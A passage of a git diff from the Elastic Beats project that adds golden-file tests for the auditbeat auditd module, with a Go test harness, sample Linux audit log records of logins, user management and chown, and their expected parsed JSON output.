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" } diff --git a/auditbeat/module/auditd/golden_files_test.go b/auditbeat/module/auditd/golden_files_test.go new file mode 100644 index 000000000000..adea47816127 --- /dev/null +++ b/auditbeat/module/auditd/golden_files_test.go @@ -0,0 +1,225 @@ +// Licensed to Elasticsearch B.V. under one or more contributor +// license agreements. See the NOTICE file distributed with +// this work for additional information regarding copyright +// ownership. Elasticsearch B.V. licenses this file to you under +// the Apache License, Version 2.0 (the "License"); you may +// not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +// +build linux + +package auditd + +import ( + "bufio" + "context" + "encoding/json" + "flag" + "io/ioutil" + "os" + "os/user" + "path/filepath" + "strings" + "testing" + "time" + + "github.com/stretchr/testify/assert" + + "github.com/elastic/go-libaudit/v2" + "github.com/elastic/go-libaudit/v2/aucoalesce" + + "github.com/elastic/beats/v7/libbeat/common" + "github.com/elastic/beats/v7/metricbeat/mb" + mbtest "github.com/elastic/beats/v7/metricbeat/mb/testing" +) + +const ( + testDir = "testdata" + testExt = ".log" + testPattern = "*" + testExt + goldenSuffix = "-expected.json" + goldenPattern = testPattern + goldenSuffix + fileTimeout = 3 * time.Minute + terminator = "type=TEST msg=audit(0.0:585): msg=\"terminate\"" +) + +var ( + update = flag.Bool("update", false, "update golden data") + + knownUsers = []user.User{ + {Username: "vagrant", Uid: "1000"}, + {Username: "alice", Uid: "1001"}, + {Username: "oldbob", Uid: "1002"}, + {Username: "charlie", Uid: "1003"}, + {Username: "testuser", Uid: "1004"}, + {Username: "bob", Uid: "9999"}, + } + + knownGroups = []user.Group{ + {Name: "vagrant", Gid: "1000"}, + {Name: "alice", Gid: "1001"}, + {Name: "oldbob", Gid: "1002"}, + {Name: "charlie", Gid: "1003"}, + {Name: "testgroup", Gid: "1004"}, + {Name: "bob", Gid: "9999"}, + } +) + +func readLines(path string) (lines []string, err error) { + f, err := os.Open(path) + if err != nil { + return nil, err + } + defer f.Close() + scanner := bufio.NewScanner(f) + for scanner.Scan() { + lines = append(lines, scanner.Text()) + } + return lines, scanner.Err() +} + +func readGoldenFile(t testing.TB, path string) (events []common.MapStr) { + data, err := ioutil.ReadFile(path) + if err != nil { + t.Fatalf("can't read golden file '%s': %v", path, err) + } + if err = json.Unmarshal(data, &events); err != nil { + t.Fatalf("error decoding JSON from golden file '%s': %v", path, err) + } + return +} + +func normalize(t testing.TB, events []mb.Event) (norm []common.MapStr) { + for _, ev := range events { + var output common.MapStr + data, err := json.Marshal(ev.BeatEvent(moduleName, metricsetName).Fields) + if err != nil { + t.Fatal(err) + } + json.Unmarshal(data, &output) + norm = append(norm, output) + } + return norm +} + +func configForGolden() map[string]interface{} { + return map[string]interface{}{ + "module": "auditd", + "failure_mode": "log", + "socket_type": "unicast", + "include_warnings": true, + "include_raw_message": true, + "resolve_ids": true, + "stream_buffer_consumers": 1, + } +} + +type TerminateFn func(mb.Event) bool +type terminableReporter struct { + events []mb.Event + ctx context.Context + cancel context.CancelFunc + err error + isLast TerminateFn +} + +func (r *terminableReporter) Event(event mb.Event) bool { + if r.ctx.Err() != nil { + return false + } + if r.isLast(event) { + r.cancel() + return false + } + r.events = append(r.events, event) + return true +} + +func (r *terminableReporter) Error(err error) bool { + if r.ctx.Err() != nil && r.err != nil { + r.err = err + r.cancel() + } + return true +} + +func (r *terminableReporter) Done() <-chan struct{} { + return r.ctx.Done() +} + +func runTerminableReporter(timeout time.Duration, ms mb.PushMetricSetV2, isLast TerminateFn) []mb.Event { + ctx, cancel := context.WithTimeout(context.Background(), timeout) + reporter := terminableReporter{ + ctx: ctx, + cancel: cancel, + isLast: isLast, + } + go ms.Run(&reporter) + <-ctx.Done() + return reporter.events +} + +func isTestEvent(event mb.Event) bool { + mt, ok := event.ModuleFields["message_type"] + return ok && mt == "test" +} + +func TestGoldenFiles(t *testing.T) { + // Add testing users and groups to test with resolve_ids enabled. + aucoalesce.HardcodeUsers(knownUsers...) + aucoalesce.HardcodeGroups(knownGroups...) + + sourceFiles, err := filepath.Glob(filepath.Join(testDir, testPattern)) + if err != nil { + t.Fatal(err) + } + + for _, file := range sourceFiles { + testName := strings.TrimSuffix(filepath.Base(file), testExt) + t.Run(testName, func(t *testing.T) { + lines, err := readLines(file) + if err != nil { + t.Fatalf("error reading log file '%s': %v", file, err) + } + mock := NewMock(). + // Get Status response for initClient + returnACK().returnStatus(). + // Send expected ACKs for initialization + returnACK().returnACK().returnACK().returnACK().returnACK(). + // Send audit messages + returnMessage(lines...). + // Send stream terminator + returnMessage(terminator) + + ms := mbtest.NewPushMetricSetV2(t, configForGolden()) + auditMetricSet := ms.(*MetricSet) + auditMetricSet.client.Close() + auditMetricSet.client = &libaudit.AuditClient{Netlink: mock} + mbEvents := runTerminableReporter(fileTimeout, ms, isTestEvent) + t.Logf("Received %d events for %d audit records", len(mbEvents), len(lines)) + assertNoErrors(t, mbEvents) + events := normalize(t, mbEvents) + goldenPath := file + goldenSuffix + if *update { + data, err := json.MarshalIndent(events, "", " ") + if err != nil { + t.Fatal(err) + } + if err = ioutil.WriteFile(goldenPath, data, 0644); err != nil { + t.Fatalf("failed writing golden file '%s': %v", goldenPath, err) + } + } + golden := readGoldenFile(t, goldenPath) + assert.EqualValues(t, golden, events) + }) + } +} diff --git a/auditbeat/module/auditd/testdata/auditlogin.log b/auditbeat/module/auditd/testdata/auditlogin.log new file mode 100644 index 000000000000..6cc3de721f02 --- /dev/null +++ b/auditbeat/module/auditd/testdata/auditlogin.log @@ -0,0 +1,3 @@ +type=LOGIN msg=audit(1611244872.857:1414): pid=27681 uid=0 old-auid=4294967295 auid=1000 tty=(none) old-ses=4294967295 ses=58 res=1 +type=LOGIN msg=audit(1611244909.293:1465): pid=27768 uid=0 old-auid=1000 auid=1001 tty=pts2 old-ses=58 ses=59 res=1 +type=LOGIN msg=audit(1234877011.799:7734): login pid=26125 uid=0 old auid=4294967295 new auid=0 old ses=4294967295 new ses=1172 diff --git a/auditbeat/module/auditd/testdata/auditlogin.log-expected.json b/auditbeat/module/auditd/testdata/auditlogin.log-expected.json new file mode 100644 index 000000000000..c2bd2506e813 --- /dev/null +++ b/auditbeat/module/auditd/testdata/auditlogin.log-expected.json @@ -0,0 +1,183 @@ +[ + { + "auditd": { + "data": { + "old-ses": "4294967295", + "tty": "(none)" + }, + "message_type": "login", + "result": "success", + "sequence": 1414, + "session": "58", + "summary": { + "actor": { + "primary": "unset", + "secondary": "root" + }, + "object": { + "primary": "1000", + "type": "user-session" + } + } + }, + "event": { + "action": "changed-login-id-to", + "category": [ + "authentication" + ], + "kind": "event", + "original": [ + "type=LOGIN msg=audit(1611244872.857:1414): pid=27681 uid=0 old-auid=4294967295 auid=1000 tty=(none) old-ses=4294967295 ses=58 res=1" + ], + "outcome": "success", + "type": [ + "start" + ] + }, + "process": { + "pid": 27681 + }, + "related": { + "user": [ + "vagrant" + ] + }, + "service": { + "type": "auditd" + }, + "user": { + "audit": { + "id": "1000", + "name": "vagrant" + }, + "effective": { + "id": "1000", + "name": "vagrant" + } + } + }, + { + "auditd": { + "data": { + "old-ses": "58", + "tty": "pts2" + }, + "message_type": "login", + "result": "success", + "sequence": 1465, + "session": "59", + "summary": { + "actor": { + "primary": "vagrant", + "secondary": "root" + }, + "object": { + "primary": "1001", + "type": "user-session" + } + } + }, + "event": { + "action": "changed-login-id-to", + "category": [ + "authentication" + ], + "kind": "event", + "original": [ + "type=LOGIN msg=audit(1611244909.293:1465): pid=27768 uid=0 old-auid=1000 auid=1001 tty=pts2 old-ses=58 ses=59 res=1" + ], + "outcome": "success", + "type": [ + "start" + ] + }, + "process": { + "pid": 27768 + }, + "related": { + "user": [ + "alice", + "vagrant" + ] + }, + "service": { + "type": "auditd" + }, + "user": { + "audit": { + "id": "1001", + "name": "alice" + }, + "effective": { + "id": "1001", + "name": "alice" + }, + "id": "1000", + "name": "vagrant", + "old-auid": { + "id": "1000", + "name": "vagrant" + } + } + }, + { + "auditd": { + "data": { + "new_ses": "1172", + "old_ses": "4294967295" + }, + "message_type": "login", + "result": "unknown", + "sequence": 7734, + "session": "", + "summary": { + "actor": { + "primary": "4294967295", + "secondary": "root" + }, + "object": { + "primary": "0", + "type": "user-session" + } + } + }, + "event": { + "action": "changed-login-id-to", + "category": [ + "authentication" + ], + "kind": "event", + "original": [ + "type=LOGIN msg=audit(1234877011.799:7734): login pid=26125 uid=0 old auid=4294967295 new auid=0 old ses=4294967295 new ses=1172" + ], + "outcome": "unknown", + "type": [ + "start" + ] + }, + "process": { + "pid": 26125 + }, + "related": { + "user": [ + "root" + ] + }, + "service": { + "type": "auditd" + }, + "user": { + "effective": { + "id": "0", + "name": "root" + }, + "new_auid": { + "id": "0", + "name": "root" + }, + "old_auid": { + "id": "4294967295" + } + } + } +] \ No newline at end of file diff --git a/auditbeat/module/auditd/testdata/centos7.log b/auditbeat/module/auditd/testdata/centos7.log new file mode 100644 index 000000000000..a17b4b0c7fd0 --- /dev/null +++ b/auditbeat/module/auditd/testdata/centos7.log @@ -0,0 +1,8 @@ +type=USER_START msg=audit(1610992796.780:425): pid=10174 uid=0 auid=1000 ses=3 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=PAM:session_open grantors=pam_selinux,pam_loginuid,pam_selinux,pam_namespace,pam_keyinit,pam_keyinit,pam_limits,pam_systemd,pam_unix,pam_lastlog acct="vagrant" exe="/usr/sbin/sshd" hostname=10.0.2.2 addr=10.0.2.2 terminal=ssh res=success' +type=ADD_GROUP msg=audit(1610992959.555:463): pid=10246 uid=0 auid=1000 ses=3 subj=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 msg='op=add-group acct="bob" exe="/usr/sbin/useradd" hostname=localhost.localdomain addr=127.0.0.1 terminal=pts/1 res=success' +type=ADD_USER msg=audit(1610992959.558:464): pid=10246 uid=0 auid=1000 ses=3 subj=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 msg='op=add-user id=1002 exe="/usr/sbin/useradd" hostname=localhost.localdomain addr=127.0.0.1 terminal=pts/1 res=success' +type=USER_MGMT msg=audit(1611054112.528:629): pid=20839 uid=0 auid=1000 ses=3 subj=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 msg='op=changing-primary-group id=1002 exe="/usr/sbin/usermod" hostname=localhost.localdomain addr=? terminal=pts/1 res=success' +type=USER_MGMT msg=audit(1611054112.538:631): pid=20839 uid=0 auid=1000 ses=3 subj=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 msg='op=updating-home-dir-owner id=1002 exe="/usr/sbin/usermod" hostname=localhost.localdomain addr=? terminal=pts/1 res=success' +type=USER_MGMT msg=audit(1611054337.523:639): pid=20862 uid=0 auid=1000 ses=3 subj=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 msg='op=changing-uid id=9999 exe="/usr/sbin/usermod" hostname=localhost.localdomain addr=? terminal=pts/1 res=success' +type=USER_MGMT msg=audit(1611054337.530:641): pid=20862 uid=0 auid=1000 ses=3 subj=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 msg='op=updating-mail-file-owner id=9999 exe="/usr/sbin/usermod" hostname=localhost.localdomain addr=? terminal=pts/1 res=success' +type=USER_MGMT msg=audit(1611054337.531:642): pid=20862 uid=0 auid=1000 ses=3 subj=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 msg='op=updating-home-dir-owner id=9999 exe="/usr/sbin/usermod" hostname=localhost.localdomain addr=? terminal=pts/1 res=success' diff --git a/auditbeat/module/auditd/testdata/centos7.log-expected.json b/auditbeat/module/auditd/testdata/centos7.log-expected.json new file mode 100644 index 000000000000..8df1f7943f83 --- /dev/null +++ b/auditbeat/module/auditd/testdata/centos7.log-expected.json @@ -0,0 +1,621 @@ +[ + { + "auditd": { + "data": { + "acct": "vagrant", + "grantors": "pam_selinux,pam_loginuid,pam_selinux,pam_namespace,pam_keyinit,pam_keyinit,pam_limits,pam_systemd,pam_unix,pam_lastlog", + "hostname": "10.0.2.2", + "op": "PAM:session_open", + "terminal": "ssh" + }, + "message_type": "user_start", + "result": "success", + "sequence": 425, + "session": "3", + "summary": { + "actor": { + "primary": "vagrant", + "secondary": "vagrant" + }, + "how": "/usr/sbin/sshd", + "object": { + "primary": "ssh", + "secondary": "10.0.2.2", + "type": "user-session" + } + } + }, + "event": { + "action": "started-session", + "category": [ + "session" + ], + "kind": "event", + "original": [ + "type=USER_START msg=audit(1610992796.780:425): pid=10174 uid=0 auid=1000 ses=3 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=PAM:session_open grantors=pam_selinux,pam_loginuid,pam_selinux,pam_namespace,pam_keyinit,pam_keyinit,pam_limits,pam_systemd,pam_unix,pam_lastlog acct=\"vagrant\" exe=\"/usr/sbin/sshd\" hostname=10.0.2.2 addr=10.0.2.2 terminal=ssh res=success'" + ], + "outcome": "success", + "type": [ + "start" + ] + }, + "network": { + "direction": "ingress" + }, + "process": { + "executable": "/usr/sbin/sshd", + "pid": 10174 + }, + "related": { + "user": [ + "vagrant" + ] + }, + "service": { + "type": "auditd" + }, + "source": { + "ip": "10.0.2.2" + }, + "user": { + "audit": { + "id": "1000", + "name": "vagrant" + }, + "id": "1000", + "name": "vagrant", + "selinux": { + "category": "c0.c1023", + "domain": "sshd_t", + "level": "s0-s0", + "role": "system_r", + "user": "system_u" + } + } + }, + { + "auditd": { + "data": { + "acct": "bob", + "addr": "127.0.0.1", + "hostname": "localhost.localdomain", + "op": "add-group", + "terminal": "pts/1" + }, + "message_type": "add_group", + "result": "success", + "sequence": 463, + "session": "3", + "summary": { + "actor": { + "primary": "vagrant", + "secondary": "root" + }, + "how": "/usr/sbin/useradd", + "object": { + "primary": "bob", + "type": "account" + } + } + }, + "event": { + "action": "added-group-account-to", + "category": [ + "iam" + ], + "kind": "event", + "original": [ + "type=ADD_GROUP msg=audit(1610992959.555:463): pid=10246 uid=0 auid=1000 ses=3 subj=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 msg='op=add-group acct=\"bob\" exe=\"/usr/sbin/useradd\" hostname=localhost.localdomain addr=127.0.0.1 terminal=pts/1 res=success'" + ], + "outcome": "success", + "type": [ + "group", + "creation" + ] + }, + "group": { + "id": "9999", + "name": "bob" + }, + "process": { + "executable": "/usr/sbin/useradd", + "pid": 10246 + }, + "related": { + "user": [ + "root", + "vagrant" + ] + }, + "service": { + "type": "auditd" + }, + "user": { + "audit": { + "id": "1000", + "name": "vagrant" + }, + "effective": { + "id": "0", + "name": "root" + }, + "id": "1000", + "name": "vagrant", + "selinux": { + "category": "c0.c1023", + "domain": "unconfined_t", + "level": "s0-s0", + "role": "unconfined_r", + "user": "unconfined_u" + } + } + }, + { + "auditd": { + "data": { + "addr": "127.0.0.1", + "hostname": "localhost.localdomain", + "id": "1002", + "op": "add-user", + "terminal": "pts/1" + }, + "message_type": "add_user", + "result": "success", + "sequence": 464, + "session": "3", + "summary": { + "actor": { + "primary": "vagrant", + "secondary": "root" + }, + "how": "/usr/sbin/useradd", + "object": { + "primary": "1002", + "type": "account" + } + } + }, + "event": { + "action": "added-user-account", + "category": [ + "iam" + ], + "kind": "event", + "original": [ + "type=ADD_USER msg=audit(1610992959.558:464): pid=10246 uid=0 auid=1000 ses=3 subj=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 msg='op=add-user id=1002 exe=\"/usr/sbin/useradd\" hostname=localhost.localdomain addr=127.0.0.1 terminal=pts/1 res=success'" + ], + "outcome": "success", + "type": [ + "user", + "creation" + ] + }, + "process": { + "executable": "/usr/sbin/useradd", + "pid": 10246 + }, + "related": { + "user": [ + "oldbob", + "root", + "vagrant" + ] + }, + "service": { + "type": "auditd" + }, + "user": { + "audit": { + "id": "1000", + "name": "vagrant" + }, + "effective": { + "id": "0", + "name": "root" + }, + "id": "1000", + "name": "vagrant", + "selinux": { + "category": "c0.c1023", + "domain": "unconfined_t", + "level": "s0-s0", + "role": "unconfined_r", + "user": "unconfined_u" + }, + "target": { + "id": "1002", + "name": "oldbob" + } + } + }, + { + "auditd": { + "data": { + "hostname": "localhost.localdomain", + "id": "1002", + "op": "changing-primary-group", + "terminal": "pts/1" + }, + "message_type": "user_mgmt", + "result": "success", + "sequence": 629, + "session": "3", + "summary": { + "actor": { + "primary": "vagrant", + "secondary": "oldbob" + }, + "how": "/usr/sbin/usermod", + "object": { + "primary": "pts/1", + "secondary": "localhost.localdomain", + "type": "user-session" + } + } + }, + "event": { + "action": "modified-user-account", + "category": [ + "iam" + ], + "kind": "event", + "original": [ + "type=USER_MGMT msg=audit(1611054112.528:629): pid=20839 uid=0 auid=1000 ses=3 subj=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 msg='op=changing-primary-group id=1002 exe=\"/usr/sbin/usermod\" hostname=localhost.localdomain addr=? terminal=pts/1 res=success'" + ], + "outcome": "success", + "type": [ + "user", + "change" + ] + }, + "process": { + "executable": "/usr/sbin/usermod", + "pid": 20839 + }, + "related": { + "user": [ + "oldbob", + "root", + "vagrant" + ] + }, + "service": { + "type": "auditd" + }, + "user": { + "audit": { + "id": "1000", + "name": "vagrant" + }, + "effective": { + "id": "0", + "name": "root" + }, + "id": "1000", + "name": "vagrant", + "selinux": { + "category": "c0.c1023", + "domain": "unconfined_t", + "level": "s0-s0", + "role": "unconfined_r", + "user": "unconfined_u" + }, + "target": { + "id": "1002", + "name": "oldbob" + } + } + }, + { + "auditd": { + "data": { + "hostname": "localhost.localdomain", + "id": "1002", + "op": "updating-home-dir-owner", + "terminal": "pts/1" + }, + "message_type": "user_mgmt", + "result": "success", + "sequence": 631, + "session": "3", + "summary": { + "actor": { + "primary": "vagrant", + "secondary": "oldbob" + }, + "how": "/usr/sbin/usermod", + "object": { + "primary": "pts/1", + "secondary": "localhost.localdomain", + "type": "user-session" + } + } + }, + "event": { + "action": "modified-user-account", + "category": [ + "iam" + ], + "kind": "event", + "original": [ + "type=USER_MGMT msg=audit(1611054112.538:631): pid=20839 uid=0 auid=1000 ses=3 subj=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 msg='op=updating-home-dir-owner id=1002 exe=\"/usr/sbin/usermod\" hostname=localhost.localdomain addr=? terminal=pts/1 res=success'" + ], + "outcome": "success", + "type": [ + "user", + "change" + ] + }, + "process": { + "executable": "/usr/sbin/usermod", + "pid": 20839 + }, + "related": { + "user": [ + "oldbob", + "root", + "vagrant" + ] + }, + "service": { + "type": "auditd" + }, + "user": { + "audit": { + "id": "1000", + "name": "vagrant" + }, + "effective": { + "id": "0", + "name": "root" + }, + "id": "1000", + "name": "vagrant", + "selinux": { + "category": "c0.c1023", + "domain": "unconfined_t", + "level": "s0-s0", + "role": "unconfined_r", + "user": "unconfined_u" + }, + "target": { + "id": "1002", + "name": "oldbob" + } + } + }, + { + "auditd": { + "data": { + "hostname": "localhost.localdomain", + "id": "9999", + "op": "changing-uid", + "terminal": "pts/1" + }, + "message_type": "user_mgmt", + "result": "success", + "sequence": 639, + "session": "3", + "summary": { + "actor": { + "primary": "vagrant", + "secondary": "bob" + }, + "how": "/usr/sbin/usermod", + "object": { + "primary": "pts/1", + "secondary": "localhost.localdomain", + "type": "user-session" + } + } + }, + "event": { + "action": "modified-user-account", + "category": [ + "iam" + ], + "kind": "event", + "original": [ + "type=USER_MGMT msg=audit(1611054337.523:639): pid=20862 uid=0 auid=1000 ses=3 subj=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 msg='op=changing-uid id=9999 exe=\"/usr/sbin/usermod\" hostname=localhost.localdomain addr=? terminal=pts/1 res=success'" + ], + "outcome": "success", + "type": [ + "user", + "change" + ] + }, + "process": { + "executable": "/usr/sbin/usermod", + "pid": 20862 + }, + "related": { + "user": [ + "bob", + "root", + "vagrant" + ] + }, + "service": { + "type": "auditd" + }, + "user": { + "audit": { + "id": "1000", + "name": "vagrant" + }, + "effective": { + "id": "0", + "name": "root" + }, + "id": "1000", + "name": "vagrant", + "selinux": { + "category": "c0.c1023", + "domain": "unconfined_t", + "level": "s0-s0", + "role": "unconfined_r", + "user": "unconfined_u" + }, + "target": { + "id": "9999", + "name": "bob" + } + } + }, + { + "auditd": { + "data": { + "hostname": "localhost.localdomain", + "id": "9999", + "op": "updating-mail-file-owner", + "terminal": "pts/1" + }, + "message_type": "user_mgmt", + "result": "success", + "sequence": 641, + "session": "3", + "summary": { + "actor": { + "primary": "vagrant", + "secondary": "bob" + }, + "how": "/usr/sbin/usermod", + "object": { + "primary": "pts/1", + "secondary": "localhost.localdomain", + "type": "user-session" + } + } + }, + "event": { + "action": "modified-user-account", + "category": [ + "iam" + ], + "kind": "event", + "original": [ + "type=USER_MGMT msg=audit(1611054337.530:641): pid=20862 uid=0 auid=1000 ses=3 subj=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 msg='op=updating-mail-file-owner id=9999 exe=\"/usr/sbin/usermod\" hostname=localhost.localdomain addr=? terminal=pts/1 res=success'" + ], + "outcome": "success", + "type": [ + "user", + "change" + ] + }, + "process": { + "executable": "/usr/sbin/usermod", + "pid": 20862 + }, + "related": { + "user": [ + "bob", + "root", + "vagrant" + ] + }, + "service": { + "type": "auditd" + }, + "user": { + "audit": { + "id": "1000", + "name": "vagrant" + }, + "effective": { + "id": "0", + "name": "root" + }, + "id": "1000", + "name": "vagrant", + "selinux": { + "category": "c0.c1023", + "domain": "unconfined_t", + "level": "s0-s0", + "role": "unconfined_r", + "user": "unconfined_u" + }, + "target": { + "id": "9999", + "name": "bob" + } + } + }, + { + "auditd": { + "data": { + "hostname": "localhost.localdomain", + "id": "9999", + "op": "updating-home-dir-owner", + "terminal": "pts/1" + }, + "message_type": "user_mgmt", + "result": "success", + "sequence": 642, + "session": "3", + "summary": { + "actor": { + "primary": "vagrant", + "secondary": "bob" + }, + "how": "/usr/sbin/usermod", + "object": { + "primary": "pts/1", + "secondary": "localhost.localdomain", + "type": "user-session" + } + } + }, + "event": { + "action": "modified-user-account", + "category": [ + "iam" + ], + "kind": "event", + "original": [ + "type=USER_MGMT msg=audit(1611054337.531:642): pid=20862 uid=0 auid=1000 ses=3 subj=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 msg='op=updating-home-dir-owner id=9999 exe=\"/usr/sbin/usermod\" hostname=localhost.localdomain addr=? terminal=pts/1 res=success'" + ], + "outcome": "success", + "type": [ + "user", + "change" + ] + }, + "process": { + "executable": "/usr/sbin/usermod", + "pid": 20862 + }, + "related": { + "user": [ + "bob", + "root", + "vagrant" + ] + }, + "service": { + "type": "auditd" + }, + "user": { + "audit": { + "id": "1000", + "name": "vagrant" + }, + "effective": { + "id": "0", + "name": "root" + }, + "id": "1000", + "name": "vagrant", + "selinux": { + "category": "c0.c1023", + "domain": "unconfined_t", + "level": "s0-s0", + "role": "unconfined_r", + "user": "unconfined_u" + }, + "target": { + "id": "9999", + "name": "bob" + } + } + } +] \ No newline at end of file diff --git a/auditbeat/module/auditd/testdata/chown.log b/auditbeat/module/auditd/testdata/chown.log new file mode 100644 index 000000000000..88995214e368 --- /dev/null +++ b/auditbeat/module/auditd/testdata/chown.log @@ -0,0 +1,4 @@ +type=SYSCALL msg=audit(1611091464.740:263): arch=c000003e syscall=260 success=yes exit=0 a0=ffffffffffffff9c a1=12d6210 a2=3e9 a3=ffffffff items=1 ppid=9492 pid=9494 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=8 comm="chown" exe="/usr/bin/chown" subj=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 key="access" +type=CWD msg=audit(1611091464.740:263): cwd="/home/vagrant" +type=PATH msg=audit(1611091464.740:263): item=0 name="test" inode=921833 dev=fd:02 mode=0100664 ouid=9999 ogid=1000 rdev=00:00 obj=unconfined_u:object_r:user_home_t:s0 objtype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0 +type=PROCTITLE msg=audit(1611091464.740:263): proctitle=63686F776E002D5200616C6963650074657374 diff --git a/auditbeat/module/auditd/testdata/chown.log-expected.json b/auditbeat/module/auditd/testdata/chown.log-expected.json new file mode 100644 index 000000000000..502ff7b51b59 --- /dev/null +++ b/auditbeat/module/auditd/testdata/chown.log-expected.json @@ -0,0 +1,134 @@ +[ + { + "auditd": { + "data": { + "a0": "ffffffffffffff9c", + "a1": "12d6210", + "a2": "3e9", + "a3": "ffffffff", + "arch": "x86_64", + "exit": "0", + "syscall": "fchownat", + "tty": "pts2" + }, + "message_type": "syscall", + "paths": [ + { + "cap_fe": "0", + "cap_fi": "0000000000000000", + "cap_fp": "0000000000000000", + "cap_fver": "0", + "dev": "fd:02", + "inode": "921833", + "item": "0", + "mode": "0100664", + "name": "test", + "obj_domain": "user_home_t", + "obj_level": "s0", + "obj_role": "object_r", + "obj_user": "unconfined_u", + "objtype": "NORMAL", + "ogid": "1000", + "ouid": "9999", + "rdev": "00:00" + } + ], + "result": "success", + "sequence": 263, + 